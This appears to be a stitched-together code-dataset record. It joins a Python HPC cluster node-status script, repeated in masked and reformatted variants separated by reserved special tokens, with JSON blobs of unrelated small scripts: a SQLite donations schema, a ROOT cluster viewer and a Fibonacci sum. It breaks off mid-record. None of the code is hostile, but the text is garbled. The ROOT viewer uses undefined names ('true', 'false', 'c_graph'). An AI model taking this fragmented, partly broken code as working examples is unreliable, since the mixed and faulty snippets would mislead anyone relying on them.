for node in cluster.nodes:
nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %
(node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *
100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (
node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0
) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *
(node.cpu_all - node.cpu_res))])
if args.show_job_owners:
nodes[-1][-1] = ''
empty = [''] * 5
users = defaultdict(list)
for job in node.jobs_qstat:
users[job.user].append(job)
for orphan in node.orphans:
users['ORPHANS'].append(orphan)
for idx, uitem in enumerate(users.items()):
u, jobs = uitem
column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in
jobs]))
if idx:
nodes.append(empty + [column_data])
else:
nodes[-1][-1] = column_data
print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',
'Jobs'], nodes)
def main():
""" Execute main program
"""
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true',
help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help=
'Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def check_status(args):
""" Print node details
:param args: Arguments from argparse
:type args: argparse.Namespace
"""
cluster = Cluster(jobs_qstat=True, nodes=True, link=True)
nodes = []
if args.filter_states:
cluster.filter_node_states(set(args.filter_states.lower().split(',')))
for node in cluster.nodes:
nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %
(node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *
100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (
node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0
) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *
(node.cpu_all - node.cpu_res))])
if args.show_job_owners:
nodes[-1][-1] = ''
empty = [''] * 5
users = defaultdict(list)
for job in node.jobs_qstat:
users[job.user].append(job)
for orphan in node.orphans:
users['ORPHANS'].append(orphan)
for idx, uitem in enumerate(users.items()):
u, jobs = uitem
column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in
jobs]))
if idx:
nodes.append(empty + [column_data])
else:
nodes[-1][-1] = column_data
print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',
'Jobs'], nodes)
def main():
""" Execute main program
"""
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true',
help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help=
'Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from collections import defaultdict
from cluster.common import Cluster
from cluster.tools import print_table
def check_status(args):
""" Print node details
:param args: Arguments from argparse
:type args: argparse.Namespace
"""
cluster = Cluster(jobs_qstat=True, nodes=True, link=True)
nodes = []
if args.filter_states:
cluster.filter_node_states(set(args.filter_states.lower().split(',')))
for node in cluster.nodes:
nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %
(node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *
100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (
node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0
) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *
(node.cpu_all - node.cpu_res))])
if args.show_job_owners:
nodes[-1][-1] = ''
empty = [''] * 5
users = defaultdict(list)
for job in node.jobs_qstat:
users[job.user].append(job)
for orphan in node.orphans:
users['ORPHANS'].append(orphan)
for idx, uitem in enumerate(users.items()):
u, jobs = uitem
column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in
jobs]))
if idx:
nodes.append(empty + [column_data])
else:
nodes[-1][-1] = column_data
print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',
'Jobs'], nodes)
def main():
""" Execute main program
"""
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true',
help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help=
'Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#!/usr/bin/env python
from collections import defaultdict
from cluster.common import Cluster
from cluster.tools import print_table
def check_status(args):
""" Print node details
:param args: Arguments from argparse
:type args: argparse.Namespace
"""
cluster = Cluster(jobs_qstat=True, nodes=True, link=True)
nodes = []
if args.filter_states:
cluster.filter_node_states(set(args.filter_states.lower().split(',')))
for node in cluster.nodes:
nodes.append([
node.name,
node.states,
node.load,
"%3d/%3d (%3d%%)" % (
node.cpu_res, node.cpu_all, 1. * node.cpu_res / node.cpu_all * 100.) if node.cpu_all else 'N/A', # Cores
"%5.1f/%5.1fG (%3d%%)" % (
node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.) if node.mem_all else 'N/A', # Memory
''.join(('*' * node.cpu_res) + ('-' * (node.cpu_all - node.cpu_res)))
])
if args.show_job_owners:
nodes[-1][-1] = ''
empty = [''] * 5
users = defaultdict(list)
for job in node.jobs_qstat:
users[job.user].append(job)
for orphan in node.orphans:
users['ORPHANS'].append(orphan)
for idx, uitem in enumerate(users.items()):
u, jobs = uitem
column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in jobs]))
if idx:
nodes.append(empty + [column_data])
else:
nodes[-1][-1] = column_data
# Printing bits
print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory', 'Jobs'], nodes)
def main():
""" Execute main program
"""
# noinspection PyCompatibility
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true', help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help='Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "381b59ab9fa85561932a9bfb9ab8cef635901a35",
"index": 7249,
"step-1": "<mask token>\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true',\n help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help=\n 'Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n check_status(args)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_status(args):\n \"\"\" Print node details\n\n :param args: Arguments from argparse\n :type args: argparse.Namespace\n \"\"\"\n cluster = Cluster(jobs_qstat=True, nodes=True, link=True)\n nodes = []\n if args.filter_states:\n cluster.filter_node_states(set(args.filter_states.lower().split(',')))\n for node in cluster.nodes:\n nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %\n (node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *\n 100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (\n node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0\n ) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *\n (node.cpu_all - node.cpu_res))])\n if args.show_job_owners:\n nodes[-1][-1] = ''\n empty = [''] * 5\n users = defaultdict(list)\n for job in node.jobs_qstat:\n users[job.user].append(job)\n for orphan in node.orphans:\n users['ORPHANS'].append(orphan)\n for idx, uitem in enumerate(users.items()):\n u, jobs = uitem\n column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in\n jobs]))\n if idx:\n nodes.append(empty + [column_data])\n else:\n nodes[-1][-1] = column_data\n print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',\n 'Jobs'], nodes)\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true',\n help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help=\n 'Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n check_status(args)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_status(args):\n \"\"\" Print node details\n\n :param args: Arguments from argparse\n :type args: argparse.Namespace\n \"\"\"\n cluster = Cluster(jobs_qstat=True, nodes=True, link=True)\n nodes = []\n if args.filter_states:\n cluster.filter_node_states(set(args.filter_states.lower().split(',')))\n for node in cluster.nodes:\n nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %\n (node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *\n 100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (\n node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0\n ) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *\n (node.cpu_all - node.cpu_res))])\n if args.show_job_owners:\n nodes[-1][-1] = ''\n empty = [''] * 5\n users = defaultdict(list)\n for job in node.jobs_qstat:\n users[job.user].append(job)\n for orphan in node.orphans:\n users['ORPHANS'].append(orphan)\n for idx, uitem in enumerate(users.items()):\n u, jobs = uitem\n column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in\n jobs]))\n if idx:\n nodes.append(empty + [column_data])\n else:\n nodes[-1][-1] = column_data\n print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',\n 'Jobs'], nodes)\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true',\n help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help=\n 'Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n check_status(args)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from collections import defaultdict\nfrom cluster.common import Cluster\nfrom cluster.tools import print_table\n\n\ndef check_status(args):\n \"\"\" Print node details\n\n :param args: Arguments from argparse\n :type args: argparse.Namespace\n \"\"\"\n cluster = Cluster(jobs_qstat=True, nodes=True, link=True)\n nodes = []\n if args.filter_states:\n cluster.filter_node_states(set(args.filter_states.lower().split(',')))\n for node in cluster.nodes:\n nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %\n (node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *\n 100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (\n node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0\n ) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *\n (node.cpu_all - node.cpu_res))])\n if args.show_job_owners:\n nodes[-1][-1] = ''\n empty = [''] * 5\n users = defaultdict(list)\n for job in node.jobs_qstat:\n users[job.user].append(job)\n for orphan in node.orphans:\n users['ORPHANS'].append(orphan)\n for idx, uitem in enumerate(users.items()):\n u, jobs = uitem\n column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in\n jobs]))\n if idx:\n nodes.append(empty + [column_data])\n else:\n nodes[-1][-1] = column_data\n print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',\n 'Jobs'], nodes)\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true',\n help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help=\n 'Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n check_status(args)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\nfrom collections import defaultdict\n\nfrom cluster.common import Cluster\nfrom cluster.tools import print_table\n\n\ndef check_status(args):\n \"\"\" Print node details\n\n :param args: Arguments from argparse\n :type args: argparse.Namespace\n \"\"\"\n cluster = Cluster(jobs_qstat=True, nodes=True, link=True)\n nodes = []\n\n if args.filter_states:\n cluster.filter_node_states(set(args.filter_states.lower().split(',')))\n\n for node in cluster.nodes:\n nodes.append([\n node.name,\n node.states,\n node.load,\n \"%3d/%3d (%3d%%)\" % (\n node.cpu_res, node.cpu_all, 1. * node.cpu_res / node.cpu_all * 100.) if node.cpu_all else 'N/A', # Cores\n \"%5.1f/%5.1fG (%3d%%)\" % (\n node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.) if node.mem_all else 'N/A', # Memory\n ''.join(('*' * node.cpu_res) + ('-' * (node.cpu_all - node.cpu_res)))\n ])\n\n if args.show_job_owners:\n nodes[-1][-1] = ''\n empty = [''] * 5\n\n users = defaultdict(list)\n for job in node.jobs_qstat:\n users[job.user].append(job)\n for orphan in node.orphans:\n users['ORPHANS'].append(orphan)\n\n for idx, uitem in enumerate(users.items()):\n u, jobs = uitem\n column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in jobs]))\n\n if idx:\n nodes.append(empty + [column_data])\n else:\n nodes[-1][-1] = column_data\n\n # Printing bits\n print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory', 'Jobs'], nodes)\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n # noinspection PyCompatibility\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true', help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help='Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n\n check_status(args)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import time
# Returns time in seconds for func(arg) to run
def time_func(func, arg):
start = time.time()
func(arg)
return time.time() - start
|
normal
|
{
"blob_id": "7f406c1cd4d56da3a7d5f8739e0b65b0e61cf637",
"index": 5290,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n",
"step-3": "import time\n\n\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n",
"step-4": "import time\n\n# Returns time in seconds for func(arg) to run\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from .gsclient import GSClient
from .gspath import GSPath
__all__ = [
"GSClient",
"GSPath",
]
|
normal
|
{
"blob_id": "7b726dd8ebbd5c49f9ce5bddb4779fcfbaaeb479",
"index": 5651,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__all__ = ['GSClient', 'GSPath']\n",
"step-3": "from .gsclient import GSClient\nfrom .gspath import GSPath\n__all__ = ['GSClient', 'GSPath']\n",
"step-4": "from .gsclient import GSClient\nfrom .gspath import GSPath\n\n__all__ = [\n \"GSClient\",\n \"GSPath\",\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
conn = sqlite3.connect('donations.sqlite')
c = conn.cursor()
query = 'DROP TABLE IF EXISTS factions;'
c.execute(query)
query = 'DROP TABLE IF EXISTS members;'
c.execute(query)
query = 'DROP TABLE IF EXISTS bank;'
c.execute(query)
conn.commit()
query = """CREATE TABLE factions(
id INTEGER PRIMARY KEY,
faction INTEGER UNIQUE,
faction_name TEXT);"""
c.execute(query)
conn.commit()
query = """CREATE TABLE members(
id INTEGER PRIMARY KEY,
member INTEGER UNIQUE,
member_name TEXT,
faction INTEGER,
FOREIGN KEY(faction) REFERENCES factions(faction));"""
c.execute(query)
conn.commit()
query = """CREATE TABLE bank(
id INTEGER PRIMARY KEY,
stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
member INTEGER UNIQUE,
money_balance INTEGER,
point_balance INTEGER,
FOREIGN KEY (member) REFERENCES members(member));"""
c.execute(query)
conn.commit()
<|reserved_special_token_1|>
import sqlite3
if __name__ == '__main__':
conn = sqlite3.connect('donations.sqlite')
c = conn.cursor()
query = 'DROP TABLE IF EXISTS factions;'
c.execute(query)
query = 'DROP TABLE IF EXISTS members;'
c.execute(query)
query = 'DROP TABLE IF EXISTS bank;'
c.execute(query)
conn.commit()
query = """CREATE TABLE factions(
id INTEGER PRIMARY KEY,
faction INTEGER UNIQUE,
faction_name TEXT);"""
c.execute(query)
conn.commit()
query = """CREATE TABLE members(
id INTEGER PRIMARY KEY,
member INTEGER UNIQUE,
member_name TEXT,
faction INTEGER,
FOREIGN KEY(faction) REFERENCES factions(faction));"""
c.execute(query)
conn.commit()
query = """CREATE TABLE bank(
id INTEGER PRIMARY KEY,
stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
member INTEGER UNIQUE,
money_balance INTEGER,
point_balance INTEGER,
FOREIGN KEY (member) REFERENCES members(member));"""
c.execute(query)
conn.commit()
<|reserved_special_token_1|>
import sqlite3
if __name__ == '__main__':
conn = sqlite3.connect('donations.sqlite')
c = conn.cursor()
query = """DROP TABLE IF EXISTS factions;"""
c.execute(query)
query = """DROP TABLE IF EXISTS members;"""
c.execute(query)
query = """DROP TABLE IF EXISTS bank;"""
c.execute(query)
conn.commit()
query = """CREATE TABLE factions(
id INTEGER PRIMARY KEY,
faction INTEGER UNIQUE,
faction_name TEXT);"""
c.execute(query)
conn.commit()
query = """CREATE TABLE members(
id INTEGER PRIMARY KEY,
member INTEGER UNIQUE,
member_name TEXT,
faction INTEGER,
FOREIGN KEY(faction) REFERENCES factions(faction));"""
c.execute(query)
conn.commit()
query = """CREATE TABLE bank(
id INTEGER PRIMARY KEY,
stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
member INTEGER UNIQUE,
money_balance INTEGER,
point_balance INTEGER,
FOREIGN KEY (member) REFERENCES members(member));"""
c.execute(query)
conn.commit()
|
flexible
|
{
"blob_id": "b6b8dfaa9644fa4f4c250358b89f4a30c26c317f",
"index": 4788,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n query = 'DROP TABLE IF EXISTS factions;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS members;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS bank;'\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-3": "import sqlite3\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n query = 'DROP TABLE IF EXISTS factions;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS members;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS bank;'\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-4": "import sqlite3\n\n\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n\n query = \"\"\"DROP TABLE IF EXISTS factions;\"\"\"\n c.execute(query)\n query = \"\"\"DROP TABLE IF EXISTS members;\"\"\"\n c.execute(query)\n query = \"\"\"DROP TABLE IF EXISTS bank;\"\"\"\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from ROOT import *
gSystem.Load("libAnalysis")
import sys
import argparse
parser = argparse.ArgumentParser(description="Python script to process and merge showers.")
group = parser.add_mutually_exclusive_group()
group.add_argument("-v", "--verbose", help="Turn on verbose output",
action="store_true")
group.add_argument("-q", "--quiet", help="Turn off most output",
action="store_true")
parser.add_argument("-s","--source",help="Name of input file")
parser.add_argument("-o","--data-output",help="Output data file, if event is changed")
parser.add_argument("-a","--ana-output",help="Analysis output file")
parser.add_argument("-n", "--num-events",help="Number of events to process")
parser.add_argument("-d","--display",help="Turn on the display to see each view before and after." )
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
if args.verbose:
print "Verbose mode turned on."
if args.source != None:
print "\tSource file is " + args.source
if args.data_output != None:
print "\tData output file is " + args.data_output
if args.ana_output != None:
print "\tAna output file is " + args.ana_output
if args.source == None:
print "Error: please specificy an input file with -s or --source."
quit()
if args.data_output == None:
args.data_output = "default_event_output.root"
print "No event output file selected. If necessary, output will go to:"
print "\t"+args.data_output
if args.ana_output == None:
args.ana_output = "default_ana_output.root"
print "No ana output file selected. If necessary, output will go to:"
print "\t"+args.ana_output
ana_proc = larlight.ana_processor()
if args.verbose:
ana_proc.set_verbosity(larlight.MSG.DEBUG)
# Not sure what this does
ana_proc.set_io_mode(larlight.storage_manager.BOTH)
# Add the input file. Not sure if the above takes multiple input files yet
ana_proc.add_input_file(args.source)
# ?
larlight.storage_manager.get().set_in_rootdir("scanner")
# set output file
ana_proc.set_output_file(args.data_output)
# Set destination for ana stuff
ana_proc.set_ana_output_file(args.ana_output)
my_merge_alg = larlight.ClusterMergeAlg()
my_merger = larlight.ClusterMerge()
my_merger.set_mergealg(my_merge_alg)
ana_proc.add_process(my_merge_alg)
ana_proc.add_process(my_merger)
c=TCanvas("c","Wire v. Time Cluster Viewer",900,600)
while ana_proc.process_event() and ana_proc.get_process_status() == ana_proc.PROCESSING:
currentview = 0;
print my_merge_alg.GetMergeTree()
for iview in xrange(0,3):
        for iclus in xrange(ana_proc.GetClusterGraph_Reco(int(iview),bool(True)).size()):
            gstart=ana_proc.GetClusterGraph_Reco(int(iview),bool(True)).at(iclus)
            gend =ana_proc.GetClusterGraph_Reco(int(iview),bool(False)).at(iclus)
xmin=ana_proc.GetHisto_Hits(int(iview)).GetXaxis().GetXmin()
xmax=ana_proc.GetHisto_Hits(int(iview)).GetXaxis().GetXmax()
ymin=ana_proc.GetHisto_Hits(int(iview)).GetYaxis().GetXmin()
ymax=ana_proc.GetHisto_Hits(int(iview)).GetYaxis().GetXmax()
gstart.GetXaxis().SetLimits(xmin,xmax)
gend.GetXaxis().SetLimits(xmin,xmax)
gstart.GetYaxis().SetRangeUser(ymin,ymax)
gend.GetYaxis().SetRangeUser(ymin,ymax)
gstart.SetTitle("View: %d, Cluster: %d"%(iview+1,iclus))
gstart.SetMarkerSize(3)
gstart.SetMarkerStyle(30)
gend.SetMarkerSize(3)
gend.SetMarkerStyle(29)
gstart.Draw("ALP")
gend.Draw("LP")
ana_proc.GetHisto_Reco(int(iview)).at(iclus).Draw("same")
leg = TLegend(0.6,0.65,0.88,0.85)
leg.AddEntry(gstart,"Start Point","p")
leg.AddEntry(gend,"End Point","p")
leg.Draw()
            c.Update()
            print "Drawing cluster %d out of %d for view %d. To look at the next cluster hit enter." % (iclus,ana_proc.GetClusterGraph_Reco(int(iview),bool(True)).size()-1,iview+1)
sys.stdin.readline()
print "Hit Enter to continue to next evt..."
sys.stdin.readline()
#ana_proc.run()
|
normal
|
{
"blob_id": "d57b91bf41f031e3362dabdef8c67a0da04fe577",
"index": 7540,
"step-1": "from ROOT import *\ngSystem.Load(\"libAnalysis\")\nimport sys\n\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Python script to process and merge showers.\")\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\"-v\", \"--verbose\", help=\"Turn on verbose output\",\n action=\"store_true\")\ngroup.add_argument(\"-q\", \"--quiet\", help=\"Turn off most output\",\n action=\"store_true\")\nparser.add_argument(\"-s\",\"--source\",help=\"Name of input file\")\nparser.add_argument(\"-o\",\"--data-output\",help=\"Output data file, if event is changed\")\nparser.add_argument(\"-a\",\"--ana-output\",help=\"Analysis output file\")\nparser.add_argument(\"-n\", \"--num-events\",help=\"Number of events to process\")\nparser.add_argument(\"-d\",\"--display\",help=\"Turn on the display to see each view before and after.\" )\nargs = parser.parse_args()\n\nif len(sys.argv) == 1:\n parser.print_help()\n\nif args.verbose:\n print \"Verbose mode turned on.\"\n if args.source != None:\n print \"\\tSource file is \" + args.source\n if args.data_output != None:\n print \"\\tData output file is \" + args.data_output\n if args.ana_output != None:\n print \"\\tAna output file is \" + args.ana_output\n\nif args.source == None:\n print \"Error: please specificy an input file with -s or --source.\"\n quit()\n\nif args.data_output == None:\n args.data_output = \"default_event_output.root\"\n print \"No event output file selected. If necessary, output will go to:\"\n print \"\\t\"+args.data_output\n\nif args.ana_output == None:\n args.ana_output = \"default_ana_output.root\"\n print \"No ana output file selected. If necessary, output will go to:\"\n print \"\\t\"+args.ana_output\n\n\nana_proc = larlight.ana_processor()\n\nif args.verbose:\n ana_proc.set_verbosity(larlight.MSG.DEBUG)\n\n# Not sure what this does\nana_proc.set_io_mode(larlight.storage_manager.BOTH)\n\n# Add the input file. Not sure if the above takes multiple input files yet\nana_proc.add_input_file(args.source)\n\n# ?\nlarlight.storage_manager.get().set_in_rootdir(\"scanner\")\n\n# set output file\nana_proc.set_output_file(args.data_output)\n\n# Set destination for ana stuff\nana_proc.set_ana_output_file(args.ana_output)\n\nmy_merge_alg = larlight.ClusterMergeAlg()\nmy_merger = larlight.ClusterMerge()\n\nmy_merger.set_mergealg(my_merge_alg)\n\nana_proc.add_process(my_merge_alg)\n\nana_proc.add_process(my_merger)\n\nc=TCanvas(\"c\",\"Wire v. 
Time Cluster Viewer\",900,600)\n\n\n\nwhile ana_proc.process_event() and ana_proc.get_process_status() == ana_proc.PROCESSING:\n currentview = 0;\n print my_merge_alg.GetMergeTree()\n for iview in xrange(0,3):\n for iclus in xrange(ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).size()):\n gstart=ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).at(iclus)\n gend =ana_proc.GetClusterGraph_Reco(int(iview),bool(false)).at(iclus)\n xmin=ana_proc.GetHisto_Hits(int(iview)).GetXaxis().GetXmin()\n xmax=ana_proc.GetHisto_Hits(int(iview)).GetXaxis().GetXmax()\n ymin=ana_proc.GetHisto_Hits(int(iview)).GetYaxis().GetXmin()\n ymax=ana_proc.GetHisto_Hits(int(iview)).GetYaxis().GetXmax()\n gstart.GetXaxis().SetLimits(xmin,xmax)\n gend.GetXaxis().SetLimits(xmin,xmax) \n gstart.GetYaxis().SetRangeUser(ymin,ymax)\n gend.GetYaxis().SetRangeUser(ymin,ymax)\n gstart.SetTitle(\"View: %d, Cluster: %d\"%(iview+1,iclus))\n gstart.SetMarkerSize(3)\n gstart.SetMarkerStyle(30)\n gend.SetMarkerSize(3)\n gend.SetMarkerStyle(29)\n gstart.Draw(\"ALP\")\n gend.Draw(\"LP\")\n ana_proc.GetHisto_Reco(int(iview)).at(iclus).Draw(\"same\")\n leg = TLegend(0.6,0.65,0.88,0.85)\n leg.AddEntry(gstart,\"Start Point\",\"p\")\n leg.AddEntry(gend,\"End Point\",\"p\")\n leg.Draw()\n c_graph.Update()\n print \"Drawing cluster %d out of %d for view %d. To look at the next cluster hit enter.\" % (iclus,ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).size()-1,iview+1)\n sys.stdin.readline()\n\n print \"Hit Enter to continue to next evt...\"\n sys.stdin.readline()\n\n#ana_proc.run()\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# coding: utf-8
# In[50]:
## Description
## Adds the Fibonacci numbers smaller than 4 million
## Weekly Journal
## When using while True, "break" MUST be used to avoid infinite loops
## Questions
## None
fib=[1,2]
counter=1
while True:
if fib[counter]>4000000:
flag=0
break
else:
fib.append(fib[counter]+fib[counter-1])
counter+=1
fib=fib[0:len(fib)-1]
total=sum(fib)
print(total)
|
normal
|
{
"blob_id": "e2572b48f7183353ba2aab0500130dc8a71a0b22",
"index": 5286,
"step-1": "<mask token>\n",
